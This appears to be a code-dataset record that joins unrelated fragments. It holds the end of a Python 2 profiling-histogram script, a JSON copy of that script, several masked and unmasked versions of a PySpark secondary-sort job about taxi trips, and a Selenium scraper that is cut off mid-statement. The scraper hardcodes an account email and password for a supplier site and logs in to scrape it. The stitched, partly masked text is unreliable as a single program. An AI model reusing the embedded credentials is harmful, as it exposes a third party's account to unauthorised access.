for line, bursts in peaks_normavg.iteritems():
result[line] = bursts
for line, bursts in nonpeaks_normavg.iteritems():
if result.has_key(line):
result[line] -= bursts
else:
result[line] = -1.0*bursts
xlinenum = []
ybursts = []
filename = []
for line, bursts in result.iteritems():
if bursts>FREQ_THRESHOLD:
match = re.search(r'\s*(\d+)\s+\((.*)\)', line)
if match:
xlinenum += [ match.group(1) ]
ybursts += [ float(bursts) ]
matchfname = re.search(r'(\b\w+\.[cFf][\d]*\,)', match.group(2))
if matchfname is None:
fname = 'Unresolved'
else:
fname = matchfname.group(1)[:-1]
filename += [ fname ]
zipped = zip(xlinenum, ybursts, filename)
zipped.sort()
xlinenum, ybursts, filename = zip(*zipped)
#title = 'Frequent source lines in a region of interest'
title = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)
xlabel = 'Sampled function line number'
ylabel = 'Normalized frequency'
draw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)
|
normal
|
{
"blob_id": "872b13a93c9aba55c143ee9891543f059c070a36",
"index": 4631,
"step-1": "# dg_kernel plots\n\nimport os\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport csv\nimport sys\n\nNE_SIZE = 128\nTITLE_SIZE = 35 \nTEXT_SIZE = 30 \nMARKER_SIZE = 10\nLINE_WIDTH = 5\ncolors = { idx:cname for idx, cname in enumerate(mcolors.cnames) }\n\neventname = 'L1_DCM'\ncallstacklevel = 7\n\nFREQ_THRESHOLD = 0.02\n\nROOT = '/global/homes/g/grnydawn/trepo/temp/cylcworkspace/extrae_HSW/cgroup/folding/02242017_1353/codeline'\n\n# read histogram file\ndef read_histogram(histofile):\n histodict = {}\n with open(histofile, 'rb') as f:\n reader = csv.reader(f, delimiter='\\t')\n try:\n exclude_item = []\n for i, row in enumerate(reader):\n if len(row)<1: continue\n if i==0:\n name = []\n for j, item in enumerate(row[1:]):\n if len(item)<1:\n exclude_item += [ j ]\n continue\n name += [ item ]\n histodict['Head'] = name\n else:\n numval = []\n for j, item in enumerate(row[1:]):\n if j in exclude_item: continue\n try:\n numval += [ float(item) ]\n except Exception as e:\n if len(item)<1:\n numval += [ 0.0 ]\n else:\n print e\n histodict[row[0]] = numval\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (histofile, reader.line_num, e))\n\n return histodict\n\ndef draw_histogram(xname, yval, title, xlabel, ylabel, filename, xrange=None):\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n ax.set_title(title, fontsize=TITLE_SIZE)\n ax.set_xlabel(xlabel, fontsize=TEXT_SIZE)\n ax.set_ylabel(ylabel, fontsize=TEXT_SIZE)\n\n if xrange: XL = xrange\n else: XL = [0, len(xname)]\n\n ax.set_xticks(range(len(xname)))\n newname = []\n for i, xn in enumerate(xname):\n if i%1==0:\n newname += [ xn ]\n else:\n newname += [ \"\" ]\n ax.set_xticklabels(newname)\n\n xval = np.arange(len(xname))[XL[0]:XL[1]] \n yval = yval[XL[0]:XL[1]] \n\n YL = [0, max(yval)*1.5]\n ax.axis(XL + YL)\n\n gridlines = ax.get_xaxis().get_gridlines()\n for gl in gridlines:\n gl.set_visible(False)\n\n ax.grid(b=True, which='major', color='b', linestyle='-', linewidth=0.5)\n ax.grid(b=False, which='minor', color='#888888', linestyle='-',linewidth=0.5)\n ax.grid(True)\n\n for label in ax.xaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n #for label in ax.xaxis.get_ticklabels(): label.set_fontsize(20)\n for label in ax.yaxis.get_ticklabels(): label.set_fontsize(TEXT_SIZE)\n\n fnamelist = list(set(filename))\n clist = []\n for fname in filename:\n color = colors[fnamelist.index(fname)]\n clist += [ color ]\n\n width = (XL[1]-XL[0])/float(len(xval)*2)\n histo = ax.bar(xval-width/2, yval, width, color=clist)\n\n dummy_bars = []\n for i, fname in enumerate(fnamelist):\n dummy_bars += ax.bar([0], [1.E-16], width, color=colors[i])\n\n ax.legend(dummy_bars, fnamelist, loc=2)\n #plt.savefig(\"./dgomp.png\")\n plt.show() \n\npeak1 = read_histogram('%s/%s_high_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\npeak2 = read_histogram('%s/%s_high_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\npeaks_avgsum = sum(peak1['Average']) + sum(peak2['Average'])\n#print 'peaks_avgsum = ', peaks_avgsum\n\npeaks_normavg = {}\n\nfor i, line in enumerate(peak1['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak1['Average'][i]\n else:\n peaks_normavg[line] = peak1['Average'][i]\nfor i, line in enumerate(peak2['Head']):\n if peaks_normavg.has_key(line):\n peaks_normavg[line] += peak2['Average'][i]\n else:\n peaks_normavg[line] = peak2['Average'][i]\n\n#print 'peaks_normavg before = ', peaks_normavg.values()[:30]\nfor line in 
peaks_normavg.keys():\n peaks_normavg[line] = peaks_normavg[line]/peaks_avgsum\n#print 'peaks_normavg after = ', peaks_normavg.values()[:30]\n\n\nnonpeak1 = read_histogram('%s/%s_low_linelevel%d_region0.csv'%(ROOT, eventname, callstacklevel))\nnonpeak2 = read_histogram('%s/%s_low_linelevel%d_region1.csv'%(ROOT, eventname, callstacklevel))\n\nnonpeaks_avgsum = sum(nonpeak1['Average']) + sum(nonpeak2['Average'])\n\nnonpeaks_normavg = {}\n\nfor i, line in enumerate(nonpeak1['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak1['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak1['Average'][i]\nfor i, line in enumerate(nonpeak2['Head']):\n if nonpeaks_normavg.has_key(line):\n nonpeaks_normavg[line] += nonpeak2['Average'][i]\n else:\n nonpeaks_normavg[line] = nonpeak2['Average'][i]\n\n#print 'nonpeaks_normavg before = ', nonpeaks_normavg.values()[:30]\nfor line in nonpeaks_normavg.keys():\n nonpeaks_normavg[line] = nonpeaks_normavg[line]/nonpeaks_avgsum\n#print 'nonpeaks_normavg after = ', nonpeaks_normavg.values()[:30]\n\n#import pdb; pdb.set_trace()\n\nresult = {}\nfor line, bursts in peaks_normavg.iteritems():\n result[line] = bursts\nfor line, bursts in nonpeaks_normavg.iteritems():\n if result.has_key(line):\n result[line] -= bursts\n else:\n result[line] = -1.0*bursts\n\nxlinenum = []\nybursts = []\nfilename = []\nfor line, bursts in result.iteritems():\n if bursts>FREQ_THRESHOLD:\n match = re.search(r'\\s*(\\d+)\\s+\\((.*)\\)', line)\n if match:\n xlinenum += [ match.group(1) ]\n ybursts += [ float(bursts) ]\n matchfname = re.search(r'(\\b\\w+\\.[cFf][\\d]*\\,)', match.group(2))\n if matchfname is None: \n fname = 'Unresolved'\n else:\n fname = matchfname.group(1)[:-1]\n filename += [ fname ]\n \nzipped = zip(xlinenum, ybursts, filename)\nzipped.sort()\nxlinenum, ybursts, filename = zip(*zipped)\n#title = 'Frequent source lines in a region of interest' \ntitle = 'Frequent source lines at high %s regions in callstack level %d'%(eventname, callstacklevel)\nxlabel = 'Sampled function line number'\nylabel = 'Normalized frequency'\n\ndraw_histogram(xlinenum, np.array(ybursts), title, xlabel, ylabel, filename)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
<|reserved_special_token_0|>
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == '__main__':
conf = SparkConf()
ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=
partition_func, numPartitions=4, keyfunc=key_func, ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group,
preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
<|reserved_special_token_1|>
import time
import itertools
import re
from pyspark import SparkContext, SparkConf
from pyspark.rdd import portable_hash
from datetime import datetime
APP_NAME = 'in-shuffle-secondary-sort-compute'
INPUT_FILE = '/data/Taxi_Trips.csv.xsmall'
OUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'
COMMA_DELIMITER = re.compile(',(?=(?:[^"]*"[^"]*")*[^"]*$)')
FIRST_KEY = 1
SECOND_KEY = 2
TRIP_END_TIMESTAMP = 3
TIMESTAMP = int(time.time())
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = entry[FIRST_KEY], entry[SECOND_KEY]
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[
SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[
TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(
) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == '__main__':
conf = SparkConf()
ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=
partition_func, numPartitions=4, keyfunc=key_func, ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group,
preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
<|reserved_special_token_1|>
import time
import itertools
import re
from pyspark import SparkContext, SparkConf
from pyspark.rdd import portable_hash
from datetime import datetime
APP_NAME = 'in-shuffle-secondary-sort-compute'
INPUT_FILE = '/data/Taxi_Trips.csv.xsmall'
OUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'
COMMA_DELIMITER = re.compile(''',(?=(?:[^"]*"[^"]*")*[^"]*$)''')
FIRST_KEY = 1
SECOND_KEY = 2
TRIP_END_TIMESTAMP = 3
TIMESTAMP = int(time.time())
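# Secondary sort: partition on the first key component only, but sort within
# each partition on the full composite key, so each primary key's records
# arrive contiguously and already ordered by the second component.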
def partition_func(key):
return portable_hash(key[0])
def key_func(entry):
return entry[0], entry[1]
def make_pair(entry):
key = (entry[FIRST_KEY], entry[SECOND_KEY])
return key, entry
def unpair(entry):
return entry[0][0], entry[1][0], entry[1][1]
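# Build (composite key, (second field, trip end)) pairs from the CSV: skip the
# header row and drop records with an empty key or end-timestamp field.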
def create_pair_rdd(ctx):
rawRDD = ctx.textFile(INPUT_FILE)
headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))
rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))
validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)
pairRDD = validRDD.map(make_pair)
compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[TRIP_END_TIMESTAMP]))
return compressedRDD
def sorted_group(lines):
return itertools.groupby(lines, key=lambda x: x[0])
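# For one key's time-ordered trips, sum the gaps between a trip's end and the
# next trip's start; overlapping trips (negative gaps) contribute nothing.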
def calculate_loss(entry):
key, group = entry
loss = 0
_, _, prev_end = next(group)
for item in group:
_, start, end = item
delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp() \
- datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()
if delta > 0:
loss += delta
prev_end = end
return key, loss
if __name__ == "__main__":
conf = SparkConf()
ctx = SparkContext(master="local[*]", appName=APP_NAME, conf=conf)
ctx.setLogLevel('INFO')
rdd = create_pair_rdd(ctx)
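    # A single shuffle both groups records by the first key component and
    # orders them by the full key; the steps below run pipelined per partition.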
sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=partition_func,
numPartitions=4,
keyfunc=key_func,
ascending=True)
unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)
groupedRDD = unpairedRDD.mapPartitions(sorted_group, preservesPartitioning=True)
lossRDD = groupedRDD.map(calculate_loss)
lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))
ctx.stop()
|
flexible
|
{
"blob_id": "05d6f15102be41937febeb63ed66a77d3b0a678e",
"index": 8517,
"step-1": "<mask token>\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\n<mask token>\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\nif __name__ == '__main__':\n conf = SparkConf()\n ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n rdd = create_pair_rdd(ctx)\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=\n partition_func, numPartitions=4, keyfunc=key_func, ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group,\n preservesPartitioning=True)\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n ctx.stop()\n",
"step-4": "import time\nimport itertools\nimport re\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.rdd import portable_hash\nfrom datetime import datetime\nAPP_NAME = 'in-shuffle-secondary-sort-compute'\nINPUT_FILE = '/data/Taxi_Trips.csv.xsmall'\nOUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'\nCOMMA_DELIMITER = re.compile(',(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)')\nFIRST_KEY = 1\nSECOND_KEY = 2\nTRIP_END_TIMESTAMP = 3\nTIMESTAMP = int(time.time())\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = entry[FIRST_KEY], entry[SECOND_KEY]\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[\n SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[\n TRIP_END_TIMESTAMP]))\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp(\n ) - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n return key, loss\n\n\nif __name__ == '__main__':\n conf = SparkConf()\n ctx = SparkContext(master='local[*]', appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n rdd = create_pair_rdd(ctx)\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=\n partition_func, numPartitions=4, keyfunc=key_func, ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group,\n preservesPartitioning=True)\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n ctx.stop()\n",
"step-5": "import time\nimport itertools\nimport re\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.rdd import portable_hash\nfrom datetime import datetime\n\nAPP_NAME = 'in-shuffle-secondary-sort-compute'\nINPUT_FILE = '/data/Taxi_Trips.csv.xsmall'\nOUTPUT_DIR = '/data/output-in-shuffle-sort-compute-{timestamp}.txt'\n\nCOMMA_DELIMITER = re.compile(''',(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)''')\n\nFIRST_KEY = 1\nSECOND_KEY = 2\nTRIP_END_TIMESTAMP = 3\n\n\nTIMESTAMP = int(time.time())\n\n\ndef partition_func(key):\n return portable_hash(key[0])\n\n\ndef key_func(entry):\n return entry[0], entry[1]\n\n\ndef make_pair(entry):\n key = (entry[FIRST_KEY], entry[SECOND_KEY])\n return key, entry\n\n\ndef unpair(entry):\n return entry[0][0], entry[1][0], entry[1][1]\n\n\ndef create_pair_rdd(ctx):\n rawRDD = ctx.textFile(INPUT_FILE)\n headerlessRDD = rawRDD.filter(lambda x: not x.startswith('Trip ID'))\n rdd = headerlessRDD.map(lambda x: COMMA_DELIMITER.split(x))\n validRDD = rdd.filter(lambda x: len(x[FIRST_KEY]) > 0 and len(x[SECOND_KEY]) > 0 and len(x[TRIP_END_TIMESTAMP]) > 0)\n pairRDD = validRDD.map(make_pair)\n compressedRDD = pairRDD.mapValues(lambda x: (x[SECOND_KEY], x[TRIP_END_TIMESTAMP]))\n\n return compressedRDD\n\n\ndef sorted_group(lines):\n return itertools.groupby(lines, key=lambda x: x[0])\n\n\ndef calculate_loss(entry):\n key, group = entry\n loss = 0\n _, _, prev_end = next(group)\n\n for item in group:\n _, start, end = item\n delta = datetime.strptime(start, '%m/%d/%Y %I:%M:%S %p').timestamp() \\\n - datetime.strptime(prev_end, '%m/%d/%Y %I:%M:%S %p').timestamp()\n if delta > 0:\n loss += delta\n prev_end = end\n\n return key, loss\n\n\nif __name__ == \"__main__\":\n conf = SparkConf()\n ctx = SparkContext(master=\"local[*]\", appName=APP_NAME, conf=conf)\n ctx.setLogLevel('INFO')\n\n rdd = create_pair_rdd(ctx)\n\n sortedRDD = rdd.repartitionAndSortWithinPartitions(partitionFunc=partition_func,\n numPartitions=4,\n keyfunc=key_func,\n ascending=True)\n unpairedRDD = sortedRDD.map(unpair, preservesPartitioning=True)\n groupedRDD = unpairedRDD.mapPartitions(sorted_group, preservesPartitioning=True)\n\n lossRDD = groupedRDD.map(calculate_loss)\n lossRDD.saveAsTextFile(OUTPUT_DIR.format(timestamp=TIMESTAMP))\n\n ctx.stop()\n",
"step-ids": [
5,
6,
8,
10,
11
]
}
|
[
5,
6,
8,
10,
11
] |
<|reserved_special_token_0|>
class ProductSpider(scrapy.Spider):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductSpider(scrapy.Spider):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
options = webdriver.ChromeOptions()
options.add_argument('--start-maximized')
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection'
).addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
csv_image_url = []
old_product_url = []
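        # Sign in first so the rest of the crawl runs in an authenticated session.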
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located
((By.ID, 'email')))
username = self.driver.find_element_by_id('email')
username.send_keys('info@themobilestore.se')
        password = self.driver.find_element_by_id('password')
        password.send_keys('order88')
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
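        # Demote last run's 'NEW' rows to 'old' in the CSV, then collect the URLs
        # already present so previously scraped products can be skipped below.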
        tmp_fd, abs_path = mkstemp()
        with fdopen(tmp_fd, 'w') as new_file:
with open('tekniknet.csv') as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
remove('tekniknet.csv')
move(abs_path, 'tekniknet.csv')
with open('tekniknet.csv', 'r') as ins:
for line in ins:
                # strip the trailing newline so stored URLs compare equal to
                # the freshly scraped ones
                old_product_url.append(line.split(',')[-1].strip())
file = open('tekniknet.csv', 'a', errors='replace')
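        # Pass 1: collect the top-level category links from the site menu.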
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info(
'*************************************************')
self.loggger.info(link1)
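        # Pass 2: visit each category (the last four menu entries are skipped)
        # and collect sub-category links, with fallbacks for pages that expose
        # their sub-categories or products through a different layout.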
for i in range(0, len(list1) - 4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME, 'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'
):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info(
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'
)
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.ID,
'categorySubCategories')))
subcategory = self.driver.find_element_by_id(
'categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath(
'.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id(
'breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath(
'.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = (csv_categories2 + category2.
text + '/')
WebDriverWait(self.driver, 20).until(EC.
presence_of_element_located((By.CLASS_NAME,
'listProduct')))
